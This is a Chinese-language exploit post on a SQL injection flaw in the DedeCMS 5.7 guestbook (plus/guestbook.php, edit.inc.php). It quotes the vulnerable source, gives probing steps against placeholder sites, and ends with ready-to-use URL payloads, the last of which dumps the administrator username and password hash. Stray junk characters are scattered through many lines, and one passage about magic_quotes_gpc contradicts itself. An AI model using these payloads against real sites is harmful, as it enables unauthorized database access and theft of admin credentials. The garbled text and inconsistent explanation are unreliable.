dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

; }+ A- S9 [# p1 f5 h, c& a漏洞文件edit.inc.php具体代码：

/ w+ V7 w# f* z6 W< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  
$ N  _! a9 i! w& l
   

+ H2 }' C4 m! c3 x; uif(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

; Z7 }$ {3 j6 |/ Ielse $GUEST_BOOK_POS = "guestbook.php";  
+ z  @8 m' l. G1 Y; w
7 F. D6 d! N* n, P   
8 V: y/ u- \: r$ [. ~0 E- s
- }4 v: |" S2 t/ I% f$id = intval($id);  
' n/ C4 J/ J0 S
& J# ]5 ?1 w* I4 f  i, x' E: nif(empty($job)) $job='view';  
6 |1 S' G% E5 E; {
' [' \5 o1 n! @* Y' Q   

6 B( J! P: ?% V1 i" {5 ^if($job=='del' && $g_isadmin)  
  F5 O* ]. u& u. ~, F
{  
9 t' S; R3 O2 ?) y/ c% Y$ `
$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  
% G% d5 G: @# U& b' V7 ~
. S! L) E% [+ e  UShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  
: _5 q7 Y5 E9 c* G2 J$ @' p
6 I3 W0 Y6 ~2 [" y* p' B, texit();  

}  

else if($job=='check' && $g_isadmin)  

{  
: U! g  [. s) F; v' g  R& Q
5 G* _: s5 Y  c: X5 d$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  
1 J0 ^: ~- R  g1 y
ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

+ X( r4 @: T% N( t4 R; J( H. felse if($job=='editok')  
# J# U- [% W4 J8 L
{  
# a) o, F0 O, \1 a( a
$ G' J$ X. T) V$remsg = trim($remsg);  
/ a0 q* F, E* i$ x. P1 N
' b+ b( n; z' [' P; a4 ~: \if($remsg!='')  

- T3 `3 R- W! B( D# p# U! H{  

9 o) J# t3 U. e0 |3 S6 V3 B8 X//管理员回复不过滤HTML By:Errorera blog:errs.cc  
( I; S3 C, R  N; K
if($g_isadmin)  
, {$ `& C/ Z6 z
{  

1 I" j5 ~7 ^) \$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  
/ S0 E! ?1 p7 M6 d5 n: a2 O- o
//$remsg <br /><font color=red>管理员回复：</font> }  

8 ]8 S4 t. a4 o9 y7 }" P) helse
) e7 J$ a9 _( ^. e# C; i5 U
{  
7 Q+ {% A3 _2 {2 ~0 G7 j
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  
$ {9 a1 D& a& D7 r2 o& U  t2 K
2 ^" A) B  [8 G& B3 M* \$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

) D, n6 P! A  }( S0 O( i$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

$msg = $oldmsg.$remsg;  

}  

}  
; l% q# X3 x0 z. K3 l1 I
//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
% k, m. Q* {3 r
  l5 m0 @: N: @& f- ~$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
- M, U( C" }+ m4 R" r* x2 n# M
ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
# n9 c* `6 |. v! S
7 c- _  E7 X5 G8 b! \+ k9 Eexit();  

: R. W6 T! m! i# w" e}  

//home:www.errs.cc  

" a# }6 ^  \( _% {# `. g# ?/ sif($g_isadmin)  

{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

2 o) i  S8 ]: H- Urequire_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

2 ?+ R5 S& }; s$ K3 \, I& e}  
# E$ E" L& L! d9 f5 l6 F
else

# h8 m0 z& M4 M) l{  
5 J. w, T, J( g( f/ W+ W- m
$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

} 漏洞成功需要条件：
7 d+ |3 ]6 h4 V$ y8 n) Y, \! Y1. php magic_quotes_gpc=off
9 g/ g, ?/ Q+ G' R7 J& g2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
9 J& s; N, x1 N6 z4 `
$ F4 U9 N# }* n- N# T) X- ~8 c怎么判断是否存在漏洞：
) s8 D- J% Y6 w/ m! j先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
% _% ~/ ?' V& f0 L, i2 Z+ q7 l访问：

www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
, f( R  {0 H0 I" i

明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
# o* [; y+ T. x4 o如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问

, o* ?& r# p" F3 ~www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样，大家有兴趣的多研究下！！
! s1 ~* H/ h2 D& U
最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！
% ?6 p$ c5 G4 Z& g8 f9 w
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='